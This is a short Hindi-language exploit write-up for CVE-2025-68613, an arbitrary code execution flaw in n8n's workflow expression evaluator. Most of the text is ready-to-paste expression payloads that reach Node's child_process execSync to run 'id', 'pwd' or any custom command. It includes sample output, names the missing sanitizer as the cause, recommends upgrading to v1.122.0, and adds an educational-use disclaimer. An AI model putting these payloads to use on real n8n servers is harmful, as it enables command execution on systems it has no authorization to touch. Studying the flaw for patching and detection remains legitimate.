
CVE-2025-68613: n8n RCE भेद्यता शोषण और दस्तावेज़ीकरण
n8n में इसके वर्कफ़्लो एक्सप्रेशन मूल्यांकन तंत्र में एक गंभीर मनमाना कोड निष्पादन भेद्यता मौजूद है। कुछ शर्तों के तहत, वर्कफ़्लो कॉन्फ़िगरेशन के दौरान प्रमाणित उपयोगकर्ताओं द्वारा प्रदान किए गए एक्सप्रेशन का मूल्यांकन ऐसे निष्पादन संदर्भ में किया जा सकता है जो अंतर्निहित रनटाइम से पर्याप्त रूप से अलग नहीं है।
इस पेलोड को एक्सप्रेशन फ़ील्ड में पेस्ट करें:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

ID कमांड:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
PWD कमांड:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
कस्टम कमांड टेम्पलेट:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
id कमांड के लिए:
uid=1000(node) gid=1000(node) groups=1000(node)
pwd कमांड के लिए:
/app
एक्सप्रेशन मूल्यांकनकर्ता में फ़ंक्शन एक्सप्रेशन को this.process (Node.js प्रोसेस ऑब्जेक्ट) तक पहुंचने से रोकने के लिए एक सैनिटाइज़र का अभाव है, जिससे सिस्टम मॉड्यूल तक पहुंच संभव हो जाती है।
n8n v1.122.0 या बाद के संस्करण में अपग्रेड करें।
अस्वीकरण: यह जानकारी केवल सैंडबॉक्स और शैक्षिक उद्देश्यों के लिए प्रदान की गई है। सिस्टम का शोषण करने के लिए इस जानकारी का अनधिकृत उपयोग अवैध और अनैतिक है। भेद्यता का परीक्षण या शोषण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।